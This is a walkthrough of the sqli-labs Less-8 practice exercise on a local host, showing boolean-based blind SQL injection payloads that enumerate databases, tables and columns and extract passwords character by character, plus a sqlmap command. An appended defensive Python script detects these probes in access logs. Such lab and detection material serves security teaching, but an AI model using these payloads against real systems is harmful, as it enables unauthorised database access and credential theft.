I. Enter an id: the page renders normally
http://127.0.0.1/sqli-labs-master/Less-8/?id=1
II. Determine the closing character and the injection type
1. Add a single quote: the page shows an error state but prints no error message
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
2. Add a comment marker: the page renders normally again, so the parameter is closed with a single quote
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+
3. Since no error message is shown, use blind injection; this level is meant for boolean-based blind injection
III. Determine the number of databases: the page renders normally when the count equals 6, so there are 6 databases
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(schema_name) from information_schema.schemata)=6 --+
# Change the limit offset to switch which database name is being extracted
# Change the second argument of substr to select which character of the database name to test
# When comparing with ascii, first narrow the range with > and <, then confirm with =
IV. Extract the database name character by character: a correct guess renders the normal page, a wrong guess renders the abnormal page
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105--+
V. Determine the number of tables in a given database
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')>3 --+
VI. Extract table names character by character
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+
VII. Determine the number of columns in a given table
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')>5 --+
VIII. Extract column names character by character
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>80--+
IX. Determine how many rows a given column has
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(username) from users)>16--+
X. Extract the data character by character
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(substr((select password from users limit 0,1),1,1))=50--+
Manual blind injection is time-consuming; sqlmap can automate it
Extract the databases
python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" -batch -dbms mysql -dbs
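As an added example that is not part of the original writeup, here is a small Python log-screening script for the defending side: it tags requests carrying the probe patterns used above (a stray quote after a numeric id, a trailing SQL comment, information_schema lookups, and the count / ascii(substr()) oracles) and flags a source IP once it has sent several such requests, since boolean blind injection needs one request per character tested. The log lines, IPs, rule names and threshold are all constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Constructed access-log sample ("ip method path status"); not from the lab.
# The paths mirror the kinds of probes the walkthrough above sends to Less-8.
SAMPLE_LOG = """\
10.0.0.5 GET /sqli-labs-master/Less-8/?id=1 200
10.0.0.5 GET /sqli-labs-master/Less-8/?id=1' 200
10.0.0.5 GET /sqli-labs-master/Less-8/?id=1'--+ 200
10.0.0.5 GET /sqli-labs-master/Less-8/?id=1'%20and%20(select%20count(schema_name)%20from%20information_schema.schemata)=6%20--+ 200
10.0.0.5 GET /sqli-labs-master/Less-8/?id=1'%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105--+ 200
10.0.0.9 GET /sqli-labs-master/Less-8/?id=2 200
"""

# Rule names are our own; each regex runs on the URL-decoded, lower-cased value.
RULES = [
    ("quote_break", re.compile(r"^\d+'")),                 # numeric id followed by a stray quote
    ("comment_tail", re.compile(r"(--|#)\s*$")),           # trailing comment that swallows the rest
    ("schema_enum", re.compile(r"information_schema\.")),  # metadata tables used to enumerate names
    ("boolean_oracle", re.compile(r"\b(and|or)\s*\(?\s*(select\s+count|ascii\s*\(\s*substr)")),
]

def classify_request(path: str) -> list[str]:
    """Return the rule names matched by any query-string parameter of `path`."""
    hits: list[str] = []
    # parse_qs percent-decodes and turns '+' into a space, so '--+' becomes '-- '
    for values in parse_qs(urlsplit(path).query, keep_blank_values=True).values():
        for value in values:
            for name, rx in RULES:
                if rx.search(value.lower()) and name not in hits:
                    hits.append(name)
    return hits

def scan_log(log_text: str, threshold: int = 3) -> dict[str, dict]:
    """Tag every request; flag an IP at `threshold` suspicious requests (blind injection needs one probe per character)."""
    per_ip: dict[str, dict] = {}
    for line in log_text.splitlines():
        ip, _method, path, _status = line.split()
        entry = per_ip.setdefault(ip, {"suspicious": 0, "rules": set()})
        hits = classify_request(path)
        if hits:
            entry["suspicious"] += 1
            entry["rules"].update(hits)
    for entry in per_ip.values():
        entry["flagged"] = entry["suspicious"] >= threshold
    return per_ip

if __name__ == "__main__":
    for ip, info in scan_log(SAMPLE_LOG).items():
        print(ip, "FLAGGED" if info["flagged"] else "ok", sorted(info["rules"]))
```

The per-IP threshold matters more than any single rule: one stray quote is often a typo, but dozens of requests that differ only in the compared ascii value are the signature of character-by-character extraction.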
over~